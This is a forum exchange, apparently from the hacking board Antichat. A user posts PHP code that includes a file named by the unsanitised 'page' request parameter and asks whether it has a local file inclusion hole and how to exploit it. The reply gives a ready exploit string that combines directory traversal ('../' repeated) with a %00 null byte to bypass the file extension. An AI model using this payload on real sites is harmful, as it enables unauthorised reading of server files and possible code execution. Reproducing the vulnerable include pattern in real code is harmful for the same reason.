09.10.2010, 19:02
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Byrger
Есть ли локальный инклуд в этом коде?
И как его использовать?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"modules_dir"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"data/modules/"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"template_dir"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"template/"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// Определяем модуль
[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"]= empty([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$site[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'start_page'[/COLOR][COLOR="#007700"]] : (string)[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]// Запрешённые шаблоны для показа
[/COLOR][COLOR="#0000BB"]$mods[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]'main'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'error'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'quick_error'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'mysql_error'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]modules_dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]template_dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.tpl'[/COLOR][COLOR="#007700"]))
{
include[/COLOR][COLOR="#0000BB"]modules_dir$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"];
}
else
{
if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]template_dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.tpl'[/COLOR][COLOR="#007700"]) and !isset([/COLOR][COLOR="#0000BB"]$mods[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$parse[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_tpl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]template_dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.tpl'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$parse[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tpl_view[/COLOR][COLOR="#007700"]();
}
else
{
[/COLOR][COLOR="#0000BB"]$system_error[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#DD0000"]'Непредвиденная ошибка в обработке команды.
Обратитесь к модератору/администратору сайта.'[/COLOR][COLOR="#007700"];
}
}[/COLOR][/COLOR]
script.php?page=../../../../../../../../../[LFI]%00
|
|
|